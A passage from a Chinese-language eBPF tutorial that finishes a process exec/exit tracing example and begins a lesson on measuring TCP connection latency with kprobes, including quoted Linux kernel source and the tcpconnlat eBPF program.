printf("%-8s %-5s %-16s %-7s %-7s %s\n",
|
||
"TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE");
|
||
while (!exiting) {
|
||
err = ring_buffer__poll(rb, 100 /* timeout, ms */);
|
||
/* Ctrl-C will cause -EINTR */
|
||
if (err == -EINTR) {
|
||
err = 0;
|
||
break;
|
||
}
|
||
if (err < 0) {
|
||
printf("Error polling perf buffer: %d\n", err);
|
||
break;
|
||
}
|
||
}
|
||
|
||
cleanup:
|
||
/* Clean up */
|
||
ring_buffer__free(rb);
|
||
bootstrap_bpf__destroy(skel);
|
||
|
||
return err < 0 ? -err : 0;
|
||
}
|
||
</code></pre>
|
||
<p>这个用户态程序主要用于加载、验证、附加 eBPF 程序,以及接收 eBPF 程序收集的事件数据,并将其打印出来。我们将分析一些关键部分。</p>
|
||
<p>首先,我们定义了一个 env 结构,用于存储命令行参数:</p>
|
||
<pre><code class="language-c">static struct env {
|
||
bool verbose;
|
||
long min_duration_ms;
|
||
} env;
|
||
</code></pre>
|
||
<p>接下来,我们使用 argp 库来解析命令行参数:</p>
|
||
<pre><code class="language-c">static const struct argp_option opts[] = {
|
||
{ "verbose", 'v', NULL, 0, "Verbose debug output" },
|
||
{ "duration", 'd', "DURATION-MS", 0, "Minimum process duration (ms) to report" },
|
||
{},
|
||
};
|
||
|
||
static error_t parse_arg(int key, char *arg, struct argp_state *state)
|
||
{
|
||
// ...
|
||
}
|
||
|
||
static const struct argp argp = {
|
||
.options = opts,
|
||
.parser = parse_arg,
|
||
.doc = argp_program_doc,
|
||
};
|
||
</code></pre>
|
||
<p>main() 函数中,首先解析命令行参数,然后设置 libbpf 的打印回调函数 libbpf_print_fn,以便在需要时输出调试信息:</p>
|
||
<pre><code class="language-c">err = argp_parse(&argp, argc, argv, 0, NULL, NULL);
|
||
if (err)
|
||
return err;
|
||
|
||
libbpf_set_print(libbpf_print_fn);
|
||
</code></pre>
|
||
<p>接下来,我们打开 eBPF 脚手架(skeleton)文件,将最小持续时间参数传递给 eBPF 程序,并加载和附加 eBPF 程序:</p>
|
||
<pre><code class="language-c">skel = bootstrap_bpf__open();
|
||
if (!skel) {
|
||
fprintf(stderr, "Failed to open and load BPF skeleton\n");
|
||
return 1;
|
||
}
|
||
|
||
skel->rodata->min_duration_ns = env.min_duration_ms * 1000000ULL;
|
||
|
||
err = bootstrap_bpf__load(skel);
|
||
if (err) {
|
||
fprintf(stderr, "Failed to load and verify BPF skeleton\n");
|
||
goto cleanup;
|
||
}
|
||
|
||
err = bootstrap_bpf__attach(skel);
|
||
if (err) {
|
||
fprintf(stderr, "Failed to attach BPF skeleton\n");
|
||
goto cleanup;
|
||
}
|
||
</code></pre>
|
||
<p>然后,我们创建一个环形缓冲区(ring buffer),用于接收 eBPF 程序发送的事件数据:</p>
|
||
<pre><code class="language-c">rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL);
|
||
if (!rb) {
|
||
err = -1;
|
||
fprintf(stderr, "Failed to create ring buffer\n");
|
||
goto cleanup;
|
||
}
|
||
</code></pre>
|
||
<p>handle_event() 函数会处理从 eBPF 程序收到的事件。根据事件类型(进程执行或退出),它会提取并打印事件信息,如时间戳、进程名、进程 ID、父进程 ID、文件名或退出代码等。</p>
|
||
<p>最后,我们使用 ring_buffer__poll() 函数轮询环形缓冲区,处理收到的事件数据:</p>
|
||
<pre><code class="language-c">while (!exiting) {
|
||
err = ring_buffer__poll(rb, 100 /* timeout, ms */);
|
||
// ...
|
||
}
|
||
</code></pre>
|
||
<p>当程序收到 SIGINT 或 SIGTERM 信号时,它会最后完成清理、退出操作,关闭和卸载 eBPF 程序:</p>
|
||
<pre><code class="language-c">cleanup:
|
||
/* Clean up */
|
||
ring_buffer__free(rb);
|
||
bootstrap_bpf__destroy(skel);
|
||
|
||
return err < 0 ? -err : 0;
|
||
}
|
||
</code></pre>
|
||
<h2 id="安装依赖"><a class="header" href="#安装依赖">安装依赖</a></h2>
|
||
<p>构建示例需要 clang、libelf 和 zlib。包名在不同的发行版中可能会有所不同。</p>
|
||
<p>在 Ubuntu/Debian 上,你需要执行以下命令:</p>
|
||
<pre><code class="language-shell">sudo apt install clang libelf1 libelf-dev zlib1g-dev
|
||
</code></pre>
|
||
<p>在 CentOS/Fedora 上,你需要执行以下命令:</p>
|
||
<pre><code class="language-shell">sudo dnf install clang elfutils-libelf elfutils-libelf-devel zlib-devel
|
||
</code></pre>
|
||
<h2 id="编译运行-1"><a class="header" href="#编译运行-1">编译运行</a></h2>
|
||
<p>编译运行上述代码:</p>
|
||
<pre><code class="language-console">$ make
|
||
BPF .output/bootstrap.bpf.o
|
||
GEN-SKEL .output/bootstrap.skel.h
|
||
CC .output/bootstrap.o
|
||
BINARY bootstrap
|
||
$ sudo ./bootstrap
|
||
[sudo] password for yunwei:
|
||
TIME EVENT COMM PID PPID FILENAME/EXIT CODE
|
||
03:16:41 EXEC sh 110688 80168 /bin/sh
|
||
03:16:41 EXEC which 110689 110688 /usr/bin/which
|
||
03:16:41 EXIT which 110689 110688 [0] (0ms)
|
||
03:16:41 EXIT sh 110688 80168 [0] (0ms)
|
||
03:16:41 EXEC sh 110690 80168 /bin/sh
|
||
03:16:41 EXEC ps 110691 110690 /usr/bin/ps
|
||
03:16:41 EXIT ps 110691 110690 [0] (49ms)
|
||
03:16:41 EXIT sh 110690 80168 [0] (51ms)
|
||
</code></pre>
|
||
<h2 id="总结-10"><a class="header" href="#总结-10">总结</a></h2>
|
||
<p>通过这个实例,我们了解了如何将 eBPF 程序与用户态程序结合使用。这种结合为开发者提供了一个强大的工具集,可以实现跨内核和用户空间的高效数据收集和处理。通过使用 eBPF 和 libbpf,您可以构建更高效、可扩展和安全的监控和性能分析工具。</p>
|
||
<p>在接下来的教程中,我们将继续深入探讨 eBPF 的高级特性,分享更多关于 eBPF 开发实践的内容。通过不断学习和实践,您将更好地理解和掌握 eBPF 技术,并将其应用于解决实际问题。</p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,请查阅 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 。您还可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf入门开发实践教程十三统计-tcp-连接延时并使用-libbpf-在用户态处理数据"><a class="header" href="#ebpf入门开发实践教程十三统计-tcp-连接延时并使用-libbpf-在用户态处理数据">eBPF入门开发实践教程十三:统计 TCP 连接延时,并使用 libbpf 在用户态处理数据</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是一项强大的网络和性能分析工具,被应用在 Linux 内核上。eBPF 允许开发者动态加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。</p>
|
||
<p>本文是 eBPF 入门开发实践教程的第十三篇,主要介绍如何使用 eBPF 统计 TCP 连接延时,并使用 libbpf 在用户态处理数据。</p>
|
||
<h2 id="背景"><a class="header" href="#背景">背景</a></h2>
|
||
<p>在进行后端开发时,不论使用何种编程语言,我们都常常需要调用 MySQL、Redis 等数据库,或执行一些 RPC 远程调用,或者调用其他的 RESTful API。这些调用的底层,通常都是基于 TCP 协议进行的。原因是 TCP 协议具有可靠连接、错误重传、拥塞控制等优点,因此在网络传输层协议中,TCP 的应用广泛程度超过了 UDP。然而,TCP 也有一些缺点,如建立连接的延时较长。因此,也出现了一些替代方案,例如 QUIC(Quick UDP Internet Connections,快速 UDP 网络连接)。</p>
|
||
<p>分析 TCP 连接延时对网络性能分析、优化以及故障排查都非常有用。</p>
|
||
<h2 id="tcpconnlat-工具概述"><a class="header" href="#tcpconnlat-工具概述">tcpconnlat 工具概述</a></h2>
|
||
<p><code>tcpconnlat</code> 这个工具能够跟踪内核中执行活动 TCP 连接的函数(如通过 <code>connect()</code> 系统调用),并测量并显示连接延时,即从发送 SYN 到收到响应包的时间。</p>
|
||
<h3 id="tcp-连接原理"><a class="header" href="#tcp-连接原理">TCP 连接原理</a></h3>
|
||
<p>TCP 连接的建立过程,常被称为“三次握手”(Three-way Handshake)。以下是整个过程的步骤:</p>
|
||
<ol>
|
||
<li>客户端向服务器发送 SYN 包:客户端通过 <code>connect()</code> 系统调用发出 SYN。这涉及到本地的系统调用以及软中断的 CPU 时间开销。</li>
|
||
<li>SYN 包传送到服务器:这是一次网络传输,涉及到的时间取决于网络延迟。</li>
|
||
<li>服务器处理 SYN 包:服务器内核通过软中断接收包,然后将其放入半连接队列,并发送 SYN/ACK 响应。这主要涉及 CPU 时间开销。</li>
|
||
<li>SYN/ACK 包传送到客户端:这是另一次网络传输。</li>
|
||
<li>客户端处理 SYN/ACK:客户端内核接收并处理 SYN/ACK 包,然后发送 ACK。这主要涉及软中断处理开销。</li>
|
||
<li>ACK 包传送到服务器:这是第三次网络传输。</li>
|
||
<li>服务器接收 ACK:服务器内核接收并处理 ACK,然后将对应的连接从半连接队列移动到全连接队列。这涉及到一次软中断的 CPU 开销。</li>
|
||
<li>唤醒服务器端用户进程:被 <code>accept()</code> 系统调用阻塞的用户进程被唤醒,然后从全连接队列中取出来已经建立好的连接。这涉及一次上下文切换的CPU开销。</li>
|
||
</ol>
|
||
<p>完整的流程图如下所示:</p>
|
||
<p><img src="13-tcpconnlat/tcpconnlat1.png" alt="tcpconnlat1" /></p>
|
||
<p>在客户端视角,在正常情况下一次TCP连接总的耗时也就就大约是一次网络RTT的耗时。但在某些情况下,可能会导致连接时的网络传输耗时上涨、CPU处理开销增加、甚至是连接失败。这种时候在发现延时过长之后,就可以结合其他信息进行分析。</p>
|
||
<h2 id="tcpconnlat-的-ebpf-实现"><a class="header" href="#tcpconnlat-的-ebpf-实现">tcpconnlat 的 eBPF 实现</a></h2>
|
||
<p>为了理解 TCP 的连接建立过程,我们需要理解 Linux 内核在处理 TCP 连接时所使用的两个队列:</p>
|
||
<ul>
|
||
<li>半连接队列(SYN 队列):存储那些正在进行三次握手操作的 TCP 连接,服务器收到 SYN 包后,会将该连接信息存储在此队列中。</li>
|
||
<li>全连接队列(Accept 队列):存储已经完成三次握手,等待应用程序调用 <code>accept()</code> 函数的 TCP 连接。服务器在收到 ACK 包后,会创建一个新的连接并将其添加到此队列。</li>
|
||
</ul>
|
||
<p>理解了这两个队列的用途,我们就可以开始探究 tcpconnlat 的具体实现。tcpconnlat 的实现可以分为内核态和用户态两个部分,其中包括了几个主要的跟踪点:<code>tcp_v4_connect</code>, <code>tcp_v6_connect</code> 和 <code>tcp_rcv_state_process</code>。</p>
|
||
<p>这些跟踪点主要位于内核中的 TCP/IP 网络栈。当执行相关的系统调用或内核函数时,这些跟踪点会被激活,从而触发 eBPF 程序的执行。这使我们能够捕获和测量 TCP 连接建立的整个过程。</p>
|
||
<p>让我们先来看一下这些挂载点的源代码:</p>
|
||
<pre><code class="language-c">SEC("kprobe/tcp_v4_connect")
|
||
int BPF_KPROBE(tcp_v4_connect, struct sock *sk)
|
||
{
|
||
return trace_connect(sk);
|
||
}
|
||
|
||
SEC("kprobe/tcp_v6_connect")
|
||
int BPF_KPROBE(tcp_v6_connect, struct sock *sk)
|
||
{
|
||
return trace_connect(sk);
|
||
}
|
||
|
||
SEC("kprobe/tcp_rcv_state_process")
|
||
int BPF_KPROBE(tcp_rcv_state_process, struct sock *sk)
|
||
{
|
||
return handle_tcp_rcv_state_process(ctx, sk);
|
||
}
|
||
</code></pre>
|
||
<p>这段代码展示了三个内核探针(kprobe)的定义。<code>tcp_v4_connect</code> 和 <code>tcp_v6_connect</code> 在对应的 IPv4 和 IPv6 连接被初始化时被触发,调用 <code>trace_connect()</code> 函数,而 <code>tcp_rcv_state_process</code> 在内核处理 TCP 连接状态变化时被触发,调用 <code>handle_tcp_rcv_state_process()</code> 函数。</p>
|
||
<p>接下来的部分将分为两大块:一部分是对这些挂载点内核态部分的分析,我们将解读内核源代码来详细说明这些函数如何工作;另一部分是用户态的分析,将关注 eBPF 程序如何收集这些挂载点的数据,以及如何与用户态程序进行交互。</p>
|
||
<h3 id="tcp_v4_connect-函数解析"><a class="header" href="#tcp_v4_connect-函数解析">tcp_v4_connect 函数解析</a></h3>
|
||
<p><code>tcp_v4_connect</code>函数是Linux内核处理TCP的IPv4连接请求的主要方式。当用户态程序通过<code>socket</code>系统调用创建了一个套接字后,接着通过<code>connect</code>系统调用尝试连接到远程服务器,此时就会触发<code>tcp_v4_connect</code>函数。</p>
|
||
<pre><code class="language-c">/* This will initiate an outgoing connection. */
|
||
int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
|
||
{
|
||
struct sockaddr_in *usin = (struct sockaddr_in *)uaddr;
|
||
struct inet_timewait_death_row *tcp_death_row;
|
||
struct inet_sock *inet = inet_sk(sk);
|
||
struct tcp_sock *tp = tcp_sk(sk);
|
||
struct ip_options_rcu *inet_opt;
|
||
struct net *net = sock_net(sk);
|
||
__be16 orig_sport, orig_dport;
|
||
__be32 daddr, nexthop;
|
||
struct flowi4 *fl4;
|
||
struct rtable *rt;
|
||
int err;
|
||
|
||
if (addr_len < sizeof(struct sockaddr_in))
|
||
return -EINVAL;
|
||
|
||
if (usin->sin_family != AF_INET)
|
||
return -EAFNOSUPPORT;
|
||
|
||
nexthop = daddr = usin->sin_addr.s_addr;
|
||
inet_opt = rcu_dereference_protected(inet->inet_opt,
|
||
lockdep_sock_is_held(sk));
|
||
if (inet_opt && inet_opt->opt.srr) {
|
||
if (!daddr)
|
||
return -EINVAL;
|
||
nexthop = inet_opt->opt.faddr;
|
||
}
|
||
|
||
orig_sport = inet->inet_sport;
|
||
orig_dport = usin->sin_port;
|
||
fl4 = &inet->cork.fl.u.ip4;
|
||
rt = ip_route_connect(fl4, nexthop, inet->inet_saddr,
|
||
sk->sk_bound_dev_if, IPPROTO_TCP, orig_sport,
|
||
orig_dport, sk);
|
||
if (IS_ERR(rt)) {
|
||
err = PTR_ERR(rt);
|
||
if (err == -ENETUNREACH)
|
||
IP_INC_STATS(net, IPSTATS_MIB_OUTNOROUTES);
|
||
return err;
|
||
}
|
||
|
||
if (rt->rt_flags & (RTCF_MULTICAST | RTCF_BROADCAST)) {
|
||
ip_rt_put(rt);
|
||
return -ENETUNREACH;
|
||
}
|
||
|
||
if (!inet_opt || !inet_opt->opt.srr)
|
||
daddr = fl4->daddr;
|
||
|
||
tcp_death_row = &sock_net(sk)->ipv4.tcp_death_row;
|
||
|
||
if (!inet->inet_saddr) {
|
||
err = inet_bhash2_update_saddr(sk, &fl4->saddr, AF_INET);
|
||
if (err) {
|
||
ip_rt_put(rt);
|
||
return err;
|
||
}
|
||
} else {
|
||
sk_rcv_saddr_set(sk, inet->inet_saddr);
|
||
}
|
||
|
||
if (tp->rx_opt.ts_recent_stamp && inet->inet_daddr != daddr) {
|
||
/* Reset inherited state */
|
||
tp->rx_opt.ts_recent = 0;
|
||
tp->rx_opt.ts_recent_stamp = 0;
|
||
if (likely(!tp->repair))
|
||
WRITE_ONCE(tp->write_seq, 0);
|
||
}
|
||
|
||
inet->inet_dport = usin->sin_port;
|
||
sk_daddr_set(sk, daddr);
|
||
|
||
inet_csk(sk)->icsk_ext_hdr_len = 0;
|
||
if (inet_opt)
|
||
inet_csk(sk)->icsk_ext_hdr_len = inet_opt->opt.optlen;
|
||
|
||
tp->rx_opt.mss_clamp = TCP_MSS_DEFAULT;
|
||
|
||
/* Socket identity is still unknown (sport may be zero).
|
||
* However we set state to SYN-SENT and not releasing socket
|
||
* lock select source port, enter ourselves into the hash tables and
|
||
* complete initialization after this.
|
||
*/
|
||
tcp_set_state(sk, TCP_SYN_SENT);
|
||
err = inet_hash_connect(tcp_death_row, sk);
|
||
if (err)
|
||
goto failure;
|
||
|
||
sk_set_txhash(sk);
|
||
|
||
rt = ip_route_newports(fl4, rt, orig_sport, orig_dport,
|
||
inet->inet_sport, inet->inet_dport, sk);
|
||
if (IS_ERR(rt)) {
|
||
err = PTR_ERR(rt);
|
||
rt = NULL;
|
||
goto failure;
|
||
}
|
||
/* OK, now commit destination to socket. */
|
||
sk->sk_gso_type = SKB_GSO_TCPV4;
|
||
sk_setup_caps(sk, &rt->dst);
|
||
rt = NULL;
|
||
|
||
if (likely(!tp->repair)) {
|
||
if (!tp->write_seq)
|
||
WRITE_ONCE(tp->write_seq,
|
||
secure_tcp_seq(inet->inet_saddr,
|
||
inet->inet_daddr,
|
||
inet->inet_sport,
|
||
usin->sin_port));
|
||
tp->tsoffset = secure_tcp_ts_off(net, inet->inet_saddr,
|
||
inet->inet_daddr);
|
||
}
|
||
|
||
inet->inet_id = get_random_u16();
|
||
|
||
if (tcp_fastopen_defer_connect(sk, &err))
|
||
return err;
|
||
if (err)
|
||
goto failure;
|
||
|
||
err = tcp_connect(sk);
|
||
|
||
if (err)
|
||
goto failure;
|
||
|
||
return 0;
|
||
|
||
failure:
|
||
/*
|
||
* This unhashes the socket and releases the local port,
|
||
* if necessary.
|
||
*/
|
||
tcp_set_state(sk, TCP_CLOSE);
|
||
inet_bhash2_reset_saddr(sk);
|
||
ip_rt_put(rt);
|
||
sk->sk_route_caps = 0;
|
||
inet->inet_dport = 0;
|
||
return err;
|
||
}
|
||
EXPORT_SYMBOL(tcp_v4_connect);
|
||
</code></pre>
|
||
<p>参考链接:<a href="https://elixir.bootlin.com/linux/latest/source/net/ipv4/tcp_ipv4.c#L340">https://elixir.bootlin.com/linux/latest/source/net/ipv4/tcp_ipv4.c#L340</a></p>
|
||
<p>接下来,我们一步步分析这个函数:</p>
|
||
<p>首先,这个函数接收三个参数:一个套接字指针<code>sk</code>,一个指向套接字地址结构的指针<code>uaddr</code>和地址的长度<code>addr_len</code>。</p>
|
||
<pre><code class="language-c">int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
|
||
</code></pre>
|
||
<p>函数一开始就进行了参数检查,确认地址长度正确,而且地址的协议族必须是IPv4。不满足这些条件会导致函数返回错误。</p>
|
||
<p>接下来,函数获取目标地址,如果设置了源路由选项(这是一个高级的IP特性,通常不会被使用),那么它还会获取源路由的下一跳地址。</p>
|
||
<pre><code class="language-c">nexthop = daddr = usin->sin_addr.s_addr;
|
||
inet_opt = rcu_dereference_protected(inet->inet_opt,
|
||
lockdep_sock_is_held(sk));
|
||
if (inet_opt && inet_opt->opt.srr) {
|
||
if (!daddr)
|
||
return -EINVAL;
|
||
nexthop = inet_opt->opt.faddr;
|
||
}
|
||
</code></pre>
|
||
<p>然后,使用这些信息来寻找一个路由到目标地址的路由项。如果不能找到路由项或者路由项指向一个多播或广播地址,函数返回错误。</p>
|
||
<p>接下来,它更新了源地址,处理了一些TCP时间戳选项的状态,并设置了目标端口和地址。之后,它更新了一些其他的套接字和TCP选项,并设置了连接状态为<code>SYN-SENT</code>。</p>
|
||
<p>然后,这个函数使用<code>inet_hash_connect</code>函数尝试将套接字添加到已连接的套接字的散列表中。如果这步失败,它会恢复套接字的状态并返回错误。</p>
|
||
<p>如果前面的步骤都成功了,接着,使用新的源和目标端口来更新路由项。如果这步失败,它会清理资源并返回错误。</p>
|
||
<p>接下来,它提交目标信息到套接字,并为之后的分段偏移选择一个安全的随机值。</p>
|
||
<p>然后,函数尝试使用TCP Fast Open(TFO)进行连接,如果不能使用TFO或者TFO尝试失败,它会使用普通的TCP三次握手进行连接。</p>
|
||
<p>最后,如果上面的步骤都成功了,函数返回成功,否则,它会清理所有资源并返回错误。</p>
|
||
<p>总的来说,<code>tcp_v4_connect</code>函数是一个处理TCP连接请求的复杂函数,它处理了很多情况,包括参数检查、路由查找、源地址选择、源路由、TCP选项处理、TCP Fast Open,等等。它的主要目标是尽可能安全和有效地建立TCP连接。</p>
|
||
<h3 id="内核态代码"><a class="header" href="#内核态代码">内核态代码</a></h3>
|
||
<pre><code class="language-c">// SPDX-License-Identifier: GPL-2.0
|
||
// Copyright (c) 2020 Wenbo Zhang
|
||
#include <vmlinux.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include "tcpconnlat.h"
|
||
|
||
#define AF_INET 2
|
||
#define AF_INET6 10
|
||
|
||
const volatile __u64 targ_min_us = 0;
|
||
const volatile pid_t targ_tgid = 0;
|
||
|
||
struct piddata {
|
||
char comm[TASK_COMM_LEN];
|
||
u64 ts;
|
||
u32 tgid;
|
||
};
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, 4096);
|
||
__type(key, struct sock *);
|
||
__type(value, struct piddata);
|
||
} start SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
|
||
__uint(key_size, sizeof(u32));
|
||
__uint(value_size, sizeof(u32));
|
||
} events SEC(".maps");
|
||
|
||
static int trace_connect(struct sock *sk)
|
||
{
|
||
u32 tgid = bpf_get_current_pid_tgid() >> 32;
|
||
struct piddata piddata = {};
|
||
|
||
if (targ_tgid && targ_tgid != tgid)
|
||
return 0;
|
||
|
||
bpf_get_current_comm(&piddata.comm, sizeof(piddata.comm));
|
||
piddata.ts = bpf_ktime_get_ns();
|
||
piddata.tgid = tgid;
|
||
bpf_map_update_elem(&start, &sk, &piddata, 0);
|
||
return 0;
|
||
}
|
||
|
||
static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk)
|
||
{
|
||
struct piddata *piddatap;
|
||
struct event event = {};
|
||
s64 delta;
|
||
u64 ts;
|
||
|
||
if (BPF_CORE_READ(sk, __sk_common.skc_state) != TCP_SYN_SENT)
|
||
return 0;
|
||
|
||
piddatap = bpf_map_lookup_elem(&start, &sk);
|
||
if (!piddatap)
|
||
return 0;
|
||
|
||
ts = bpf_ktime_get_ns();
|
||
delta = (s64)(ts - piddatap->ts);
|
||
if (delta < 0)
|
||
goto cleanup;
|
||
|
||
event.delta_us = delta / 1000U;
|
||
if (targ_min_us && event.delta_us < targ_min_us)
|
||
goto cleanup;
|
||
__builtin_memcpy(&event.comm, piddatap->comm,
|
||
sizeof(event.comm));
|
||
event.ts_us = ts / 1000;
|
||
event.tgid = piddatap->tgid;
|
||
event.lport = BPF_CORE_READ(sk, __sk_common.skc_num);
|
||
event.dport = BPF_CORE_READ(sk, __sk_common.skc_dport);
|
||
event.af = BPF_CORE_READ(sk, __sk_common.skc_family);
|
||
if (event.af == AF_INET) {
|
||
event.saddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_rcv_saddr);
|
||
event.daddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_daddr);
|
||
} else {
|
||
BPF_CORE_READ_INTO(&event.saddr_v6, sk,
|
||
__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
|
||
BPF_CORE_READ_INTO(&event.daddr_v6, sk,
|
||
__sk_common.skc_v6_daddr.in6_u.u6_addr32);
|
||
}
|
||
bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU,
|
||
&event, sizeof(event));
|
||
|
||
cleanup:
|
||
bpf_map_delete_elem(&start, &sk);
|
||
return 0;
|
||
}
|
||
|
||
SEC("kprobe/tcp_v4_connect")
|
||
int BPF_KPROBE(tcp_v4_connect, struct sock *sk)
|
||
{
|
||
return trace_connect(sk);
|
||
}
|
||
|
||
SEC("kprobe/tcp_v6_connect")
|
||
int BPF_KPROBE(tcp_v6_connect, struct sock *sk)
|
||
{
|
||
return trace_connect(sk);
|
||
}
|
||
|
||
SEC("kprobe/tcp_rcv_state_process")
|
||
int BPF_KPROBE(tcp_rcv_state_process, struct sock *sk)
|
||
{
|
||
return handle_tcp_rcv_state_process(ctx, sk);
|
||
}
|
||
|
||
SEC("fentry/tcp_v4_connect")
|
||
int BPF_PROG(fentry_tcp_v4_connect, struct sock *sk)
|
||
{
|
||
return trace_connect(sk);
|
||
}
|
||
|
||
SEC("fentry/tcp_v6_connect")
|
||
int BPF_PROG(fentry_tcp_v6_connect, struct sock *sk)
|
||
{
|
||
return trace_connect(sk);
|
||
}
|
||
|
||
SEC("fentry/tcp_rcv_state_process")
|
||
int BPF_PROG(fentry_tcp_rcv_state_process, struct sock *sk)
|
||
{
|
||
return handle_tcp_rcv_state_process(ctx, sk);
|
||
}
|
||
|
||
char LICENSE[] SEC("license") = "GPL";
|
||
</code></pre>
|
||
<p>这个eBPF(Extended Berkeley Packet Filter)程序主要用来监控并收集TCP连接的建立时间,即从发起TCP连接请求(<code>connect</code>系统调用)到连接建立完成(SYN-ACK握手过程完成)的时间间隔。这对于监测网络延迟、服务性能分析等方面非常有用。</p>
|
||
<p>首先,定义了两个eBPF maps:<code>start</code>和<code>events</code>。<code>start</code>是一个哈希表,用于存储发起连接请求的进程信息和时间戳,而<code>events</code>是一个<code>PERF_EVENT_ARRAY</code>类型的map,用于将事件数据传输到用户态。</p>
|
||
<pre><code class="language-c">struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, 4096);
|
||
__type(key, struct sock *);
|
||
__type(value, struct piddata);
|
||
} start SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
|
||
__uint(key_size, sizeof(u32));
|
||
__uint(value_size, sizeof(u32));
|
||
} events SEC(".maps");
|
||
</code></pre>
|
||
<p>在<code>tcp_v4_connect</code>和<code>tcp_v6_connect</code>的kprobe处理函数<code>trace_connect</code>中,会记录下发起连接请求的进程信息(进程名、进程ID和当前时间戳),并以socket结构作为key,存储到<code>start</code>这个map中。</p>
|
||
<pre><code class="language-c">static int trace_connect(struct sock *sk)
|
||
{
|
||
u32 tgid = bpf_get_current_pid_tgid() >> 32;
|
||
struct piddata piddata = {};
|
||
|
||
if (targ_tgid && targ_tgid != tgid)
|
||
return 0;
|
||
|
||
bpf_get_current_comm(&piddata.comm, sizeof(piddata.comm));
|
||
piddata.ts = bpf_ktime_get_ns();
|
||
piddata.tgid = tgid;
|
||
bpf_map_update_elem(&start, &sk, &piddata, 0);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>当TCP状态机处理到SYN-ACK包,即连接建立的时候,会触发<code>tcp_rcv_state_process</code>的kprobe处理函数<code>handle_tcp_rcv_state_process</code>。在这个函数中,首先检查socket的状态是否为<code>SYN-SENT</code>,如果是,会从<code>start</code>这个map中查找socket对应的进程信息。然后计算出从发起连接到现在的时间间隔,将该时间间隔,进程信息,以及TCP连接的详细信息(源端口,目标端口,源IP,目标IP等)作为event,通过<code>bpf_perf_event_output</code>函数发送到用户态。</p>
|
||
<pre><code class="language-c">static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk)
|
||
{
|
||
struct piddata *piddatap;
|
||
struct event event = {};
|
||
s64 delta;
|
||
u64 ts;
|
||
|
||
if (BPF_CORE_READ(sk, __sk_common.skc_state) != TCP_SYN_SENT)
|
||
return 0;
|
||
|
||
piddatap = bpf_map_lookup_elem(&start, &sk);
|
||
if (!piddatap)
|
||
return 0;
|
||
|
||
ts = bpf_ktime_get_ns();
|
||
delta = (s64)(ts - piddatap->ts);
|
||
if (delta < 0)
|
||
goto cleanup;
|
||
|
||
event.delta_us = delta / 1000U;
|
||
if (targ_min_us && event.delta_us < targ_min_us)
|
||
goto
|
||
|
||
cleanup;
|
||
__builtin_memcpy(&event.comm, piddatap->comm,
|
||
sizeof(event.comm));
|
||
event.ts_us = ts / 1000;
|
||
event.tgid = piddatap->tgid;
|
||
event.lport = BPF_CORE_READ(sk, __sk_common.skc_num);
|
||
event.dport = BPF_CORE_READ(sk, __sk_common.skc_dport);
|
||
event.af = BPF_CORE_READ(sk, __sk_common.skc_family);
|
||
if (event.af == AF_INET) {
|
||
event.saddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_rcv_saddr);
|
||
event.daddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_daddr);
|
||
} else {
|
||
BPF_CORE_READ_INTO(&event.saddr_v6, sk,
|
||
__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
|
||
BPF_CORE_READ_INTO(&event.daddr_v6, sk,
|
||
__sk_common.skc_v6_daddr.in6_u.u6_addr32);
|
||
}
|
||
bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU,
|
||
&event, sizeof(event));
|
||
|
||
cleanup:
|
||
bpf_map_delete_elem(&start, &sk);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>理解这个程序的关键在于理解Linux内核的网络栈处理流程,以及eBPF程序的运行模式。Linux内核网络栈对TCP连接建立的处理过程是,首先调用<code>tcp_v4_connect</code>或<code>tcp_v6_connect</code>函数(根据IP版本不同)发起TCP连接,然后在收到SYN-ACK包时,通过<code>tcp_rcv_state_process</code>函数来处理。eBPF程序通过在这两个关键函数上设置kprobe,可以在关键时刻得到通知并执行相应的处理代码。</p>
|
||
<p>一些关键概念说明:</p>
|
||
<ul>
|
||
<li>kprobe:Kernel Probe,是Linux内核中用于动态追踪内核行为的机制。可以在内核函数的入口和退出处设置断点,当断点被触发时,会执行与kprobe关联的eBPF程序。</li>
|
||
<li>map:是eBPF程序中的一种数据结构,用于在内核态和用户态之间共享数据。</li>
|
||
<li>socket:在Linux网络编程中,socket是一个抽象概念,表示一个网络连接的端点。内核中的<code>struct sock</code>结构就是对socket的实现。</li>
|
||
</ul>
|
||
<h3 id="用户态数据处理"><a class="header" href="#用户态数据处理">用户态数据处理</a></h3>
|
||
<p>用户态数据处理是使用<code>perf_buffer__poll</code>来接收并处理从内核发送到用户态的eBPF事件。<code>perf_buffer__poll</code>是libbpf库提供的一个便捷函数,用于轮询perf event buffer并处理接收到的数据。</p>
